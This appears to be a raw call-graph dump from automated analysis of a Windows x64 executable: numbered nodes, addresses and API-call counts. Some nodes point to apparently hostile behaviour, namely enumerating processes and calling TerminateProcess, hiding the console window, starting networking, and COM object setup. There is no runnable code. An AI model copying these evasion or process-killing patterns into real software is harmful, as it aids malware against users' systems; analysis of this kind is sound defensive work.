41942->41943 41944 7ff68457f4a0 50 API calls 41943->41944 41945 7ff684578a5b 41944->41945 41946 7ff68457ece0 50 API calls 41945->41946 41947 7ff684578a68 41946->41947 41948 7ff68457ece0 50 API calls 41947->41948 41949 7ff684578a75 41948->41949 41950 7ff68457f4a0 50 API calls 41949->41950 41951 7ff684578ac0 41950->41951 41952 7ff684582960 50 API calls 41951->41952 41953 7ff684578adb 41952->41953 41954 7ff68457f4a0 50 API calls 41953->41954 41955 7ff684578aef 41954->41955 41956 7ff68457f4a0 50 API calls 41955->41956 41957 7ff684578b03 41956->41957 41958 7ff68457f4a0 50 API calls 41957->41958 41959 7ff684578b17 41958->41959 41960 7ff68457eed0 50 API calls 41959->41960 41961 7ff684578b56 41960->41961 41962 7ff68457f4a0 50 API calls 41961->41962 41963 7ff684578b67 41962->41963 41964 7ff68457eed0 50 API calls 41963->41964 41965 7ff684578ba0 41964->41965 41966 7ff68457ece0 50 API calls 41965->41966 41967 7ff684578bca 41966->41967 41968 7ff68457f4a0 50 API calls 41967->41968 41969 7ff684578c09 41968->41969 41970 7ff68457f4a0 50 API calls 41969->41970 41971 7ff684578c24 41970->41971 41972 7ff68457f4a0 50 API calls 41971->41972 41973 7ff684578c38 41972->41973 41974 7ff68457eed0 50 API calls 41973->41974 41975 7ff684578c77 41974->41975 41976 7ff68457f4a0 50 API calls 41975->41976 41977 7ff684578c8b 41976->41977 41978 7ff68457eed0 50 API calls 41977->41978 41979 7ff684578cca 41978->41979 41980 7ff68457ece0 50 API calls 41979->41980 41981 7ff684578d03 41980->41981 41982 7ff68457f4a0 50 API calls 41981->41982 41983 7ff684578d17 41982->41983 41984 7ff68457f4a0 50 API calls 41983->41984 41985 7ff684578d3c 41984->41985 41986 7ff68457ece0 50 API calls 41985->41986 41987 7ff684578d49 41986->41987 41988 7ff68457ece0 50 API calls 41987->41988 41989 7ff684578d56 41988->41989 41990 7ff68457f4a0 50 API calls 41989->41990 41991 7ff684578da1 41990->41991 41992 7ff684582960 50 API calls 41991->41992 41993 7ff684578dbc 41992->41993 41994 7ff68457f4a0 50 API calls 41993->41994 41995 7ff684578dd0 41994->41995 41996 7ff68457f4a0 50 API calls 41995->41996 41997 7ff684578de4 41996->41997 41998 7ff68457eed0 50 API calls 41997->41998 41999 7ff684578e23 41998->41999 42000 7ff68457ece0 50 API calls 41999->42000 42001 7ff684578e5c 42000->42001 42002 7ff68457f4a0 50 API calls 42001->42002 42003 7ff684578e9b 42002->42003 42004 7ff68457f4a0 50 API calls 42003->42004 42005 7ff684578eb4 42004->42005 42006 7ff68457eed0 50 API calls 42005->42006 42007 7ff684578eee 42006->42007 42008 7ff68457ece0 50 API calls 42007->42008 42009 7ff684578f36 42008->42009 42010 7ff68457f4a0 50 API calls 42009->42010 42011 7ff684578f4a 42010->42011 42012 7ff68457f4a0 50 API calls 42011->42012 42013 7ff684578f6f 42012->42013 42014 7ff68457ece0 50 API calls 42013->42014 42015 7ff684578f7c 42014->42015 42016 7ff68457ece0 50 API calls 42015->42016 42017 7ff684578f89 42016->42017 42018 7ff68457f4a0 50 API calls 42017->42018 42019 7ff684578fb7 42018->42019 42020 7ff68457f4a0 50 API calls 42019->42020 42021 7ff684578fcb 42020->42021 42022 7ff68457eed0 50 API calls 42021->42022 42023 7ff68457900a 42022->42023 42024 7ff68457f4a0 50 API calls 42023->42024 42025 7ff68457901e 42024->42025 42026 7ff684582960 50 API calls 42025->42026 42027 7ff684579039 42026->42027 42028 7ff68457f4a0 50 API calls 42027->42028 42029 7ff68457904d 42028->42029 42030 7ff68457f4a0 50 API calls 42029->42030 42031 7ff684579061 42030->42031 42032 7ff68457f4a0 50 API calls 42031->42032 42033 7ff684579075 42032->42033 42034 7ff68457eed0 50 API calls 42033->42034 42035 7ff6845790b4 42034->42035 42036 7ff68457f4a0 50 API calls 42035->42036 42037 7ff6845790c8 42036->42037 42038 7ff68457eed0 50 API calls 42037->42038 42039 7ff684579107 42038->42039 42040 7ff68457ece0 50 API calls 42039->42040 42041 7ff684579131 42040->42041 42042 7ff68457f4a0 50 API calls 42041->42042 42043 7ff684579170 42042->42043 42044 7ff68457f4a0 50 API calls 42043->42044 42045 7ff68457918b 42044->42045 42046 7ff68457f4a0 50 API calls 42045->42046 42047 7ff68457919f 42046->42047 42048 7ff68457eed0 50 API calls 42047->42048 42049 7ff6845791de 42048->42049 42050 7ff68457f4a0 50 API calls 42049->42050 42051 7ff6845791f2 42050->42051 42052 7ff68457eed0 50 API calls 42051->42052 42053 7ff684579231 42052->42053 42054 7ff68457ece0 50 API calls 42053->42054 42055 7ff68457926a 42054->42055 42056 7ff68457f4a0 50 API calls 42055->42056 42057 7ff68457927e 42056->42057 42058 7ff68457f4a0 50 API calls 42057->42058 42059 7ff6845792a3 42058->42059 42060 7ff68457ece0 50 API calls 42059->42060 42061 7ff6845792b0 42060->42061 42062 7ff68457ece0 50 API calls 42061->42062 42063 7ff6845792bd 42062->42063 42064 7ff68457f4a0 50 API calls 42063->42064 42065 7ff684579308 42064->42065 42066 7ff684582960 50 API calls 42065->42066 42067 7ff684579323 42066->42067 42068 7ff68457f4a0 50 API calls 42067->42068 42069 7ff684579337 42068->42069 42070 7ff68457ece0 50 API calls 42069->42070 42071 7ff68457937a 42070->42071 42072 7ff68457f4a0 50 API calls 42071->42072 42073 7ff6845793b9 42072->42073 42074 7ff68457ece0 50 API calls 42073->42074 42075 7ff684579412 42074->42075 42076 7ff68457f4a0 50 API calls 42075->42076 42077 7ff684579426 42076->42077 42078 7ff68457f4a0 50 API calls 42077->42078 42079 7ff68457944b 42078->42079 42080 7ff68457ece0 50 API calls 42079->42080 42081 7ff684579458 42080->42081 42082 7ff68457ece0 50 API calls 42081->42082 42083 7ff684579465 42082->42083 42084 7ff68457f4a0 50 API calls 42083->42084 42085 7ff6845794b0 42084->42085 42086 7ff684582960 50 API calls 42085->42086 42087 7ff6845794cb 42086->42087 42088 7ff68457f4a0 50 API calls 42087->42088 42089 7ff6845794df 42088->42089 42090 7ff68457f4a0 50 API calls 42089->42090 42091 7ff6845794f3 42090->42091 42092 7ff68457f4a0 50 API calls 42091->42092 42093 7ff684579507 42092->42093 42094 7ff68457eed0 50 API calls 42093->42094 42095 7ff684579546 42094->42095 42096 7ff68457f4a0 50 API calls 42095->42096 42097 7ff684579557 42096->42097 42098 7ff68457eed0 50 API calls 42097->42098 42099 7ff684579590 42098->42099 42100 7ff68457ece0 50 API calls 42099->42100 42101 7ff6845795ba 42100->42101 42102 7ff68457f4a0 50 API calls 42101->42102 42103 7ff6845795f9 42102->42103 42104 7ff68457f4a0 50 API calls 42103->42104 42105 7ff684579614 42104->42105 42106 7ff68457f4a0 50 API calls 42105->42106 42107 7ff684579628 42106->42107 42108 7ff68457eed0 50 API calls 42107->42108 42109 7ff684579667 42108->42109 42110 7ff68457f4a0 50 API calls 42109->42110 42111 7ff684579678 42110->42111 42112 7ff68457eed0 50 API calls 42111->42112 42113 7ff6845796b1 42112->42113 42114 7ff68457ece0 50 API calls 42113->42114 42115 7ff6845796ea 42114->42115 42116 7ff68457f4a0 50 API calls 42115->42116 42117 7ff6845796fe 42116->42117 42118 7ff68457f4a0 50 API calls 42117->42118 42119 7ff684579723 42118->42119 42120 7ff68457ece0 50 API calls 42119->42120 42121 7ff684579730 42120->42121 42122 7ff68457ece0 50 API calls 42121->42122 42123 7ff68457973d 42122->42123 42124 7ff68457f4a0 50 API calls 42123->42124 42125 7ff684579788 42124->42125 42126 7ff684582960 50 API calls 42125->42126 42127 7ff6845797a3 42126->42127 42128 7ff68457f4a0 50 API calls 42127->42128 42129 7ff6845797b7 42128->42129 42130 7ff68457f4a0 50 API calls 42129->42130 42131 7ff6845797cb 42130->42131 42132 7ff68457f4a0 50 API calls 42131->42132 42133 7ff6845797df 42132->42133 42134 7ff68457eed0 50 API calls 42133->42134 42135 7ff68457981e 42134->42135 42136 7ff68457f4a0 50 API calls 42135->42136 42137 7ff684579832 42136->42137 42138 7ff68457eed0 50 API calls 42137->42138 42139 7ff684579871 42138->42139 42140 7ff68457ece0 50 API calls 42139->42140 42141 7ff68457989b 42140->42141 42142 7ff68457f4a0 50 API calls 42141->42142 42143 7ff6845798da 42142->42143 42144 7ff68457f4a0 50 API calls 42143->42144 42145 7ff6845798f5 42144->42145 42146 7ff68457f4a0 50 API calls 42145->42146 42147 7ff684579909 42146->42147 42148 7ff68457eed0 50 API calls 42147->42148 42149 7ff684579948 42148->42149 42150 7ff68457f4a0 50 API calls 42149->42150 42151 7ff68457995c 42150->42151 42152 7ff68457eed0 50 API calls 42151->42152 42153 7ff68457999b 42152->42153 42154 7ff68457ece0 50 API calls 42153->42154 42155 7ff6845799d4 42154->42155 42156 7ff68457f4a0 50 API calls 42155->42156 42157 7ff6845799e8 42156->42157 42158 7ff68457f4a0 50 API calls 42157->42158 42159 7ff684579a0d 42158->42159 42160 7ff68457ece0 50 API calls 42159->42160 42161 7ff684579a1a 42160->42161 42162 7ff68457ece0 50 API calls 42161->42162 42163 7ff684579a27 42162->42163 42164 7ff68457f4a0 50 API calls 42163->42164 42165 7ff684579a72 42164->42165 42166 7ff684582960 50 API calls 42165->42166 42167 7ff684579a8d 42166->42167 42168 7ff68457f4a0 50 API calls 42167->42168 42169 7ff684579a9e 42168->42169 42170 7ff68457f4a0 50 API calls 42169->42170 42171 7ff684579ab2 42170->42171 42172 7ff68457f4a0 50 API calls 42171->42172 42173 7ff684579ac6 42172->42173 42174 7ff68457eed0 50 API calls 42173->42174 42175 7ff684579b05 42174->42175 42176 7ff68457f4a0 50 API calls 42175->42176 42177 7ff684579b19 42176->42177 42178 7ff68457eed0 50 API calls 42177->42178 42179 7ff684579b58 42178->42179 42180 7ff68457ece0 50 API calls 42179->42180 42181 7ff684579b82 42180->42181 42182 7ff68457f4a0 50 API calls 42181->42182 42183 7ff684579bc1 42182->42183 42184 7ff68457f4a0 50 API calls 42183->42184 42185 7ff684579bdc 42184->42185 42186 7ff68457f4a0 50 API calls 42185->42186 42187 7ff684579bf0 42186->42187 42188 7ff68457eed0 50 API calls 42187->42188 42189 7ff684579c2f 42188->42189 42190 7ff68457f4a0 50 API calls 42189->42190 42191 7ff684579c43 42190->42191 42192 7ff68457eed0 50 API calls 42191->42192 42193 7ff684579c82 42192->42193 42194 7ff68457ece0 50 API calls 42193->42194 42195 7ff684579cbb 42194->42195 42196 7ff68457f4a0 50 API calls 42195->42196 42197 7ff684579ccf 42196->42197 42198 7ff68457f4a0 50 API calls 42197->42198 42199 7ff684579cf4 42198->42199 42200 7ff68457ece0 50 API calls 42199->42200 42201 7ff684579d01 42200->42201 42202 7ff68457ece0 50 API calls 42201->42202 42203 7ff684579d0e 42202->42203 42204 7ff68457f4a0 50 API calls 42203->42204 42205 7ff684579d59 42204->42205 42206 7ff684582960 50 API calls 42205->42206 42207 7ff684579d71 42206->42207 42208 7ff68457f4a0 50 API calls 42207->42208 42209 7ff684579d85 42208->42209 42210 7ff68457f4a0 50 API calls 42209->42210 42211 7ff684579d99 42210->42211 42212 7ff68457f4a0 50 API calls 42211->42212 42213 7ff684579dad 42212->42213 42214 7ff68457eed0 50 API calls 42213->42214 42215 7ff684579dec 42214->42215 42216 7ff68457f4a0 50 API calls 42215->42216 42217 7ff684579e00 42216->42217 42218 7ff68457eed0 50 API calls 42217->42218 42219 7ff684579e3f 42218->42219 42220 7ff68457ece0 50 API calls 42219->42220 42221 7ff684579e69 42220->42221 42222 7ff68457f4a0 50 API calls 42221->42222 42223 7ff684579ea8 42222->42223 42224 7ff68457f4a0 50 API calls 42223->42224 42225 7ff684579ec3 42224->42225 42226 7ff68457f4a0 50 API calls 42225->42226 42227 7ff684579ed7 42226->42227 42228 7ff68457eed0 50 API calls 42227->42228 42229 7ff684579f16 42228->42229 42230 7ff68457f4a0 50 API calls 42229->42230 42231 7ff684579f2a 42230->42231 42232 7ff68457eed0 50 API calls 42231->42232 42233 7ff684579f69 42232->42233 42234 7ff68457ece0 50 API calls 42233->42234 42235 7ff684579fa2 42234->42235 42236 7ff68457f4a0 50 API calls 42235->42236 42237 7ff684579fb6 42236->42237 42238 7ff68457f4a0 50 API calls 42237->42238 42239 7ff684579fdb 42238->42239 42240 7ff68457ece0 50 API calls 42239->42240 42241 7ff684579fe8 42240->42241 42242 7ff68457ece0 50 API calls 42241->42242 42243 7ff684579ff5 42242->42243 42244 7ff68457f4a0 50 API calls 42243->42244 42245 7ff68457a040 42244->42245 42246 7ff684582960 50 API calls 42245->42246 42247 7ff68457a05b 42246->42247 42627 7ff68457c790 42247->42627 42249 7ff68457a09a 42639 7ff68457c660 42249->42639 42251 7ff68457a0c6 42650 7ff684565d00 42251->42650 42253 7ff68457a14f 42254 7ff68457c660 47 API calls 42253->42254 42255 7ff68457a15c 42254->42255 42256 7ff684565d00 47 API calls 42255->42256 42257 7ff68457a1e2 42256->42257 42258 7ff68457c660 47 API calls 42257->42258 42259 7ff68457a1ef 42258->42259 42260 7ff684565d00 47 API calls 42259->42260 42261 7ff68457a278 42260->42261 42262 7ff68457c660 47 API calls 42261->42262 42263 7ff68457a285 42262->42263 42264 7ff684565d00 47 API calls 42263->42264 42265 7ff68457a308 42264->42265 42266 7ff68457c660 47 API calls 42265->42266 42267 7ff68457a315 42266->42267 42268 7ff684565d00 47 API calls 42267->42268 42269 7ff68457a322 42268->42269 42270 7ff68457c660 47 API calls 42269->42270 42271 7ff68457a32f 42270->42271 42272 7ff684565d00 47 API calls 42271->42272 42273 7ff68457a3b8 42272->42273 42274 7ff68457c660 47 API calls 42273->42274 42275 7ff68457a3c5 42274->42275 42276 7ff684565d00 47 API calls 42275->42276 42277 7ff68457a42d 42276->42277 42278 7ff68457c660 47 API calls 42277->42278 42279 7ff68457a43a 42278->42279 42280 7ff684565d00 47 API calls 42279->42280 42281 7ff68457a4c0 42280->42281 42282 7ff68457c660 47 API calls 42281->42282 42283 7ff68457a4cd 42282->42283 42284 7ff684565d00 47 API calls 42283->42284 42285 7ff68457a550 42284->42285 42286 7ff68457c660 47 API calls 42285->42286 42287 7ff68457a55d 42286->42287 42288 7ff684565d00 47 API calls 42287->42288 42289 7ff68457a5e3 42288->42289 42655 7ff684575ec0 42289->42655 42293 7ff68457a5ed 42819 7ff684567c50 42293->42819 42295 7ff68457a605 42296 7ff68457f4a0 50 API calls 42295->42296 42297 7ff68457a619 42296->42297 42298 7ff684565d00 47 API calls 42297->42298 42300 7ff68457a621 42298->42300 42299 7ff68457f4a0 50 API calls 42301 7ff68457c30f 42299->42301 42303 7ff684565d00 47 API calls 42300->42303 42307 7ff68457a667 42300->42307 42553 7ff68457c2fb 42300->42553 42302 7ff684565d00 47 API calls 42301->42302 42304 7ff68457c317 42302->42304 42303->42300 42305 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42304->42305 42306 7ff68457c324 42305->42306 43917 7ff684562370 50 API calls 2 library calls 42306->43917 42307->42553 42906 7ff68457d0e0 42307->42906 42310 7ff68457c32a 42314 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42310->42314 42311 7ff68457b22f 42312 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42311->42312 42313 7ff68457b260 42312->42313 43169 7ff684584160 42313->43169 42318 7ff68457c330 42314->42318 42315 7ff68457c354 43921 7ff684562410 50 API calls std::_Throw_Cpp_error 42315->43921 42320 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42318->42320 42319 7ff68457c35a 42321 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42319->42321 42322 7ff68457c336 42320->42322 42323 7ff68457c360 42321->42323 43918 7ff684562410 50 API calls std::_Throw_Cpp_error 42322->43918 43922 7ff684562410 50 API calls std::_Throw_Cpp_error 42323->43922 42324 7ff6845844a0 50 API calls std::_Throw_Cpp_error 42514 7ff68457a696 __std_exception_copy std::_Locinfo::_Locinfo_ctor Concurrency::details::ContextBase::CancellationBeaconStack::Grow codecvt 42324->42514 42326 7ff68457c342 42332 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42326->42332 42327 7ff68457b292 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42327->42319 42328 7ff68457b4c2 42327->42328 42329 7ff68457b2f0 42327->42329 42333 7ff684581fe0 10 API calls 42328->42333 42334 7ff684581fe0 10 API calls 42329->42334 42330 7ff68457c33c 42340 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42330->42340 42336 7ff68457c348 42332->42336 42337 7ff68457b4d5 42333->42337 42339 7ff68457b303 42334->42339 43919 7ff684562410 50 API calls std::_Throw_Cpp_error 42336->43919 42341 7ff6845822a0 87 API calls 42337->42341 42342 7ff6845822a0 87 API calls 42339->42342 42340->42326 42345 7ff68457b4c0 42341->42345 42346 7ff68457b30b 42342->42346 42350 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42345->42350 42347 7ff68457f4a0 50 API calls 42346->42347 42351 7ff68457b31e 42347->42351 42349 7ff68457c34e 43920 7ff684562410 50 API calls std::_Throw_Cpp_error 42349->43920 42352 7ff68457b50e 42350->42352 42353 7ff68457f4a0 50 API calls 42351->42353 43409 7ff68456b600 42352->43409 42357 7ff68457b332 42353->42357 43183 7ff684566190 42357->43183 42395 7ff68457f4a0 50 API calls 42395->42514 42399 7ff684565d00 47 API calls 42399->42514 42408 7ff6845860e0 50 API calls 42408->42514 42463 7ff6845a2a38 50 API calls std::_Facet_Register 42463->42514 42499 7ff6845974c0 58 API calls 42499->42514 42501 7ff684598f10 67 API calls 42501->42514 42514->42304 42514->42306 42514->42310 42514->42311 42514->42315 42514->42318 42514->42322 42514->42324 42514->42326 42514->42330 42514->42336 42514->42349 42514->42395 42514->42399 42514->42408 42514->42463 42514->42499 42514->42501 42517 7ff684598e50 50 API calls 42514->42517 42909 7ff68456e790 42514->42909 43040 7ff6845808c0 42514->43040 43045 7ff68457ec10 42514->43045 43050 7ff6845710f0 42514->43050 43153 7ff684583ad0 42514->43153 43157 7ff684570ff0 42514->43157 43886 7ff684582c60 50 API calls 4 library calls 42514->43886 43887 7ff6845994c0 58 API calls 4 library calls 42514->43887 43888 7ff684582ee0 50 API calls 3 library calls 42514->43888 43889 7ff684585e60 50 API calls 3 library calls 42514->43889 43890 7ff68457f4e0 42514->43890 43904 7ff6845846a0 47 API calls 2 library calls 42514->43904 43905 7ff6845721c0 127 API calls 7 library calls 42514->43905 43906 7ff684572ef0 127 API calls 7 library calls 42514->43906 43907 7ff684580370 42514->43907 42517->42514 42550->41877 42553->42299 42555 7ff68457f060 42554->42555 42555->42555 42556 7ff684584160 50 API calls 42555->42556 42557 7ff68457845a 42556->42557 42558 7ff684577970 42557->42558 43923 7ff6845a3600 42558->43923 42561 7ff6845779ad 43925 7ff684581dc0 42561->43925 42562 7ff684577a10 OpenProcess 42572 7ff6845779cf memcpy_s 42562->42572 42564 7ff6845779c8 42565 7ff6845a2770 codecvt 8 API calls 42564->42565 42567 7ff684577b70 42565->42567 42566 7ff684577a6a K32EnumProcessModules 42568 7ff684577a87 K32GetModuleBaseNameW 42566->42568 42566->42572 42579 7ff684581fe0 42567->42579 42568->42572 42569 7ff684577b2b CloseHandle 42569->42572 42570 7ff684577b04 TerminateProcess 42571 7ff684577b1b 42570->42571 42573 7ff684581fe0 10 API calls 42571->42573 42572->42562 42572->42564 42572->42566 42572->42569 42572->42570 42574 7ff684577b8c 42573->42574 42575 7ff684581fe0 10 API calls 42574->42575 42576 7ff684577b97 42575->42576 42577 7ff6845822a0 87 API calls 42576->42577 42578 7ff684577b9f CloseHandle 42577->42578 42578->42564 42580 7ff684582010 42579->42580 42581 7ff684581160 10 API calls 42580->42581 42582 7ff68458205f 42580->42582 42581->42582 42583 7ff68458220e 42582->42583 42586 7ff68458224c 42582->42586 42584 7ff68457849c 42583->42584 43983 7ff6845812c0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 42583->43983 42589 7ff684582420 42584->42589 43984 7ff6845a49c0 RtlPcToFileHeader RaiseException 42586->43984 42588 7ff68458229f 42590 7ff68458242b 42589->42590 42591 7ff684581160 10 API calls 42590->42591 42592 7ff684587096 42590->42592 42591->42592 42594 7ff68458723a 42592->42594 42596 7ff684587282 42592->42596 42593 7ff6845784ab 42593->41861 42594->42593 43985 7ff6845812c0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 42594->43985 43986 7ff6845a49c0 RtlPcToFileHeader RaiseException 42596->43986 42598 7ff6845872d7 42600 7ff6845822c8 42599->42600 43987 7ff6845872e0 42600->43987 42605 7ff684581160 10 API calls 42606 7ff6845784be GetConsoleWindow ShowWindow WSAStartup 42605->42606 42606->41865 42606->41866 42608 7ff68457ef68 42607->42608 42609 7ff68457ef11 42607->42609 42610 7ff6845a2770 codecvt 8 API calls 42608->42610 44021 7ff684585e60 50 API calls 3 library calls 42609->44021 42612 7ff68457859d 42610->42612 42612->41882 42613 7ff68457ef16 42614 7ff68457ef5d 42613->42614 42616 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 42613->42616 44022 7ff6845846a0 47 API calls 2 library calls 42614->44022 42616->42613 42618 7ff6845a2a38 std::_Facet_Register 50 API calls 42617->42618 42619 7ff68457861a 42618->42619 42619->41888 42621 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 42620->42621 42622 7ff68458297f 42621->42622 44023 7ff6845829c0 42622->44023 42625 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 42626 7ff684578803 42625->42626 42626->41914 42628 7ff6845a2a38 std::_Facet_Register 50 API calls 42627->42628 42630 7ff68457c7c5 42628->42630 42629 7ff68457c8e6 42629->42249 42630->42629 42631 7ff68457c904 42630->42631 42632 7ff6845a2a38 std::_Facet_Register 50 API calls 42630->42632 42634 7ff6845829c0 50 API calls 42630->42634 42635 7ff68457f4e0 50 API calls std::_Throw_Cpp_error 42630->42635 44076 7ff6845639b0 50 API calls std::_Throw_Cpp_error 42631->44076 42632->42630 42634->42630 42635->42630 42640 7ff68457c676 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42639->42640 42641 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42640->42641 42642 7ff68457c6d5 42641->42642 42643 7ff68457c660 47 API calls 42642->42643 42645 7ff68457c6f2 42643->42645 42644 7ff68457c720 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42644->42251 42645->42644 42646 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42645->42646 42649 7ff68457c746 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42646->42649 42647 7ff68457c961 42649->42647 44077 7ff68457c6e0 47 API calls 2 library calls 42649->44077 42651 7ff684565d13 42650->42651 42652 7ff684565d37 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42650->42652 42651->42652 42653 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42651->42653 42652->42253 42654 7ff684565d5d 42653->42654 42656 7ff6845a2a38 std::_Facet_Register 50 API calls 42655->42656 42657 7ff684575f0f memcpy_s 42656->42657 42658 7ff684575f47 GetModuleFileNameA 42657->42658 44078 7ff684587bd0 50 API calls 6 library calls 42657->44078 42659 7ff684575f65 GetLastError 42658->42659 42660 7ff684575fe1 42658->42660 42659->42657 42659->42660 42661 7ff684575fea GetLastError 42660->42661 42662 7ff6845760a8 42660->42662 42663 7ff684576015 42661->42663 42665 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42662->42665 42663->42663 42664 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42663->42664 42703 7ff68457602b Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42664->42703 42666 7ff6845760ea 42665->42666 42668 7ff68457610a 42666->42668 42669 7ff6845778e9 42666->42669 42671 7ff6845860e0 50 API calls 42668->42671 44080 7ff684562410 50 API calls std::_Throw_Cpp_error 42669->44080 42673 7ff684576148 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42671->42673 42672 7ff684577955 42676 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42672->42676 42677 7ff684576185 CoInitializeEx 42673->42677 42717 7ff6845778ee 42673->42717 42674 7ff68457795b 42681 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42674->42681 42675 7ff6845a2770 codecvt 8 API calls 42680 7ff6845778cb 42675->42680 42676->42674 42678 7ff68457629c CoCreateInstance 42677->42678 42679 7ff684576197 42677->42679 42683 7ff6845762d5 42678->42683 42684 7ff6845763e0 VariantInit VariantInit VariantInit VariantInit 42678->42684 42682 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42679->42682 42789 7ff684565d60 CreateToolhelp32Snapshot 42680->42789 42685 7ff684577961 42681->42685 42687 7ff6845761c0 42682->42687 42688 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42683->42688 42690 7ff684576533 VariantClear VariantClear VariantClear VariantClear 42684->42690 42686 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42686->42672 42687->42703 42687->42717 42689 7ff6845762fe 42688->42689 42691 7ff68457633b CoUninitialize 42689->42691 42694 7ff684576336 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42689->42694 42689->42717 42692 7ff684576578 42690->42692 42693 7ff684576691 42690->42693 42699 7ff684576063 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42691->42699 42691->42703 42695 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42692->42695 42696 7ff6845a2a38 std::_Facet_Register 50 API calls 42693->42696 42694->42691 42698 7ff6845765a1 42695->42698 42697 7ff6845766b2 42696->42697 42700 7ff6845766bf SysAllocString 42697->42700 42704 7ff6845766ef 42697->42704 42701 7ff6845765d9 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42698->42701 42698->42717 42699->42674 42708 7ff684576096 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42699->42708 42700->42704 42700->42717 42702 7ff6845765ec CoUninitialize 42701->42702 42702->42699 42702->42703 42703->42672 42703->42699 42707 7ff68457672d SysFreeString 42704->42707 42711 7ff684576736 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42704->42711 42704->42717 42705 7ff68457675d 42709 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42705->42709 42706 7ff684576880 42710 7ff6845a2a38 std::_Facet_Register 50 API calls 42706->42710 42707->42711 42708->42675 42712 7ff684576786 42709->42712 42713 7ff684576899 42710->42713 42711->42705 42711->42706 42714 7ff6845767be Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42712->42714 42712->42717 42715 7ff6845768a6 SysAllocString 42713->42715 42718 7ff6845768d6 42713->42718 42716 7ff6845767d1 CoUninitialize 42714->42716 42715->42717 42715->42718 42716->42699 42716->42703 42717->42686 42718->42717 42719 7ff68457690e SysFreeString 42718->42719 42720 7ff684576917 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42718->42720 42719->42720 42721 7ff684576a91 42720->42721 42722 7ff68457696e 42720->42722 42725 7ff684576be8 42721->42725 42726 7ff684576ab7 42721->42726 42723 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42722->42723 42724 7ff684576997 42723->42724 42724->42717 42727 7ff6845769cf Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42724->42727 42732 7ff684576d58 42725->42732 42733 7ff684576c27 42725->42733 42728 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42726->42728 42730 7ff6845769e2 CoUninitialize 42727->42730 42729 7ff684576ae0 42728->42729 42729->42717 42731 7ff684576b18 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42729->42731 42730->42699 42730->42703 42736 7ff684576b39 CoUninitialize 42731->42736 42738 7ff684576ec0 42732->42738 42739 7ff684576d8f 42732->42739 42734 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42733->42734 42735 7ff684576c50 42734->42735 42735->42717 42737 7ff684576c88 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42735->42737 42736->42699 42736->42703 42741 7ff684576ca9 CoUninitialize 42737->42741 42744 7ff684576ef8 42738->42744 42745 7ff684577029 42738->42745 42740 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42739->42740 42742 7ff684576db8 42740->42742 42741->42699 42741->42703 42742->42717 42743 7ff684576df0 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42742->42743 42747 7ff684576e11 CoUninitialize 42743->42747 42746 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42744->42746 42750 7ff684577196 42745->42750 42751 7ff684577065 42745->42751 42748 7ff684576f21 42746->42748 42747->42699 42747->42703 42748->42717 42749 7ff684576f59 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42748->42749 42756 7ff684576f7a CoUninitialize 42749->42756 42753 7ff6845a2a38 std::_Facet_Register 50 API calls 42750->42753 42752 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42751->42752 42754 7ff68457708e 42752->42754 42755 7ff6845771c9 42753->42755 42754->42717 42757 7ff6845770c6 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42754->42757 42760 7ff6845771f5 42755->42760 44079 7ff6845a2440 25 API calls 3 library calls 42755->44079 42756->42699 42756->42703 42759 7ff6845770e7 CoUninitialize 42757->42759 42759->42699 42759->42703 42760->42717 42761 7ff68457722f SysFreeString 42760->42761 42762 7ff684577238 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42760->42762 42761->42762 42763 7ff68457726d 42762->42763 42769 7ff68457739e SysAllocString 42762->42769 42764 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42763->42764 42765 7ff684577296 42764->42765 42765->42717 42767 7ff6845772ce Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42765->42767 42772 7ff6845772ef CoUninitialize 42767->42772 42768 7ff684577438 